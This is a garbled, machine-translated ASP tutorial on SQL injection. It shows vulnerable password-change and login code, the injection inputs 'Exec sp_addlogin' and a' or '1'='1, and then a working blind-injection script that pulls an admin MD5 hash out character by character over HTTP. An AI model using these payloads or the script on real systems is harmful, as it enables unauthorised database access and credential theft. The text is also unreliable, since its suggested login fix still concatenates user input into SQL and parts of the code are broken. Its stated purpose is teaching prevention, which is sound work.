SQL Injection risk example

In ASP Program If our program is improperly designed, the database may be under the control of others. The following is a simple user password change. Code --------------------- Username = request ("user_name") Pwd = request ("PWD") username = Replace (username, "'", "'' ") Pwd = Replace (PWD, "'","''") SQL = "Update tbl_test set Pwd = '" & PWD & "'where uid ='" & username & "'" set rs1_conn.exe cute (SQL) ------------ now, if I register a user with the username "AA'; Exec sp_addlogin" Haha ", what will happen when the user changes the password (assuming it is changed to pp ?? SQL changes to update tbl_test set Pwd = 'pp 'Where uid = 'a'; Exec sp_addlogin 'hahaha' results in that the user password is not modified because there is no AA user, however, you have created a login in your database. The new login name is Haha and the user name is slightly modified. In fact, you can run any SQL statement, all this happens in any SQL system process without your knowledge. In fact, the above is just a demonstration. If you change the user name slightly, we can add a DBA account, delete all records, read user passwords, and other unauthorized operations. Solution: before you use a parameter, perform a strict test on the parameter. In particular, the user must not only check the data type and length of the parameter, but also the content of the parameter. Let's look at another piece of code. (User login) username = request ("user_name") Pwd = request ("PWD") username = Replace (username ,"'","''") pwd = Replace (PWD, "'", "'' ") SQL =" select uid, PWD from account where uid = '"& username &"' and Pwd = '"& PWD"' "Rs. open SQL, Conn, 1, 1, if not Rs. EOF then response. write RS (0) & "Welcome, you have logged in successfully" else response. write "Login Failed, incorrect username or password" end if ............ the preceding program vulnerabilities are obvious. We can log on to the system using the username: Admin Password: a' or '1' = '1 and easily log on to the system using the admin account because our SQL statement is changed to the select uid, PWD from account where uid = 'admin' and Pwd = 'A' or '1' = '1' apparently uid = 'admin' and Pwd = 'A' or '1' = '1' is a permanent foundation, so Rs. the correct syntax for false EOF should be SQL = "select uid, PWD from account where uid = '" & username & "' and Pwd = '" & PWD "'" Rs. open SQL, Conn, 1, 1, if RS (0) = username and RS (1) = PWD then response. write RS (0) & "Welcome, you have logged in successfully" else response. write "Login Failed, incorrect username or password" end if ---- full text --------

 

 

'Do not use this code for illegal purposes. This code is only intended to allow ASP fans to understand the principles and prevent them from happening.

Function bytes2bstr (VIN)
Dim strreturn
Dim I, thischarcode, nextcharcode
Strreturn = ""
For I = 1 to lenb (VIN)
Thischarcode = ASCB (midb (Vin, I, 1 ))
If thischarcode <& h80 then
Strreturn = strreturn & CHR (thischarcode)
Else
Nextcharcode = ASCB (midb (VIN, I + 1, 1 ))
Strreturn = strreturn & CHR (clng (thischarcode) * & h100 + CINT (nextcharcode ))
I = I + 1
End if
Next
Bytes2bstr = strreturn
End Function

Function gethttppage (URL)
Dim HTTP
Set HTTP = Createobject ("msxml2.xmlhttp ")
HTTP. Open "get", URL, false
HTTP. Send ()
If HTTP. readystate <> 4 then
Exit Function
End if
Gethttppage = bytes2bstr (HTTP. responsebody)
Set HTTP = nothing
If err. Number <> 0 then err. Clear
End Function

 

Function regexptest (patrn, strng)
Dim RegEx, retval 'to create a variable.
Set RegEx = new Regexp 'to create a regular expression.
RegEx. pattern = patrn 'setting mode.
RegEx. ignorecase = false' specifies whether to enable case sensitivity.
Regexptest = RegEx. Test (strng.
End Function

 

Password = ""
Keyword = "Forum Homepage" 'returns the string that will appear on the correct page
Url1 = "http: // QQ/BBS/list. asp? Boardid = 7 "'SQL Injection entry
Passlen = 32' MD5 password is usually 32-bit
Dim pass
Pass = array (99,100,101,102,) 'password value is usually 0-9, A-F

 

Server. scripttimeout = 999
For I = 1 to passlen
Flag = false
Url = url1 & "and (select ASC (mid (password," & I & ", 1) from Admin where ID> 0) =" 'the key to construct an SQL statement is
For J = 0 to ubound (PASS)
STR = gethttppage (URL & pass (j ))
Flag = regexptest (keyword, STR)
If flag = true then
Password = PASSWORD & CHR (Pass (j ))
Exit
End if
Next
Next

 

Response. Write (password)